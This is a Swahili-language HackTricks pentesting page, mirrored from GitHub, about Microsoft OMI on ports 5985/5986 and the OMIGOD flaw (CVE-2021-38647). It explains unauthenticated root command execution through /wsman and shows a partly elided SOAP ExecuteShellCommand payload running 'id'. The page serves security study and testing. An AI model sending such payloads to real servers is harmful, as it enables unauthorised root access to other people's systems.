maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/5985-5986-pentesting-omi.md

44 lines
2.1 KiB
Markdown
Raw Blame History

# 5985,5986 - Pentesting OMI
{{#include ../banners/hacktricks-training.md}}
### **Taarifa za Msingi**
**OMI** inawasilishwa kama chombo **[open-source](https://github.com/microsoft/omi)** na Microsoft, kilichoundwa kwa ajili ya usimamizi wa usanidi wa mbali. Ni muhimu hasa kwa seva za Linux kwenye Azure zinazotumia huduma kama:
- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**
Mchakato `omiengine` unazinduliwa na kusikiliza kwenye interfaces zote kama root wakati huduma hizi zinapowashwa.
**Bandari za Kawaida** zinazotumika ni **5985** (http) na **5986** (https).
### **[CVE-2021-38647 Uthibitisho](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**
Kama ilivyoshuhudiwa tarehe 16 Septemba, seva za Linux zilizowekwa kwenye Azure zikiwa na huduma zilizoelezwa zina hatari kutokana na toleo dhaifu la OMI. Uthibitisho huu uko katika usimamizi wa ujumbe wa seva ya OMI kupitia kiunganishi cha `/wsman` bila kuhitaji kichwa cha Uthibitisho, ikidhihirisha mteja vibaya.
Mshambuliaji anaweza kutumia hii kwa kutuma payload ya "ExecuteShellCommand" ya SOAP bila kichwa cha Uthibitisho, ikilazimisha seva kutekeleza amri kwa haki za root.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Kwa maelezo zaidi kuhusu CVE hii **[angalia hii](https://github.com/horizon3ai/CVE-2021-38647)**.
## Marejeo
- [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
- [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink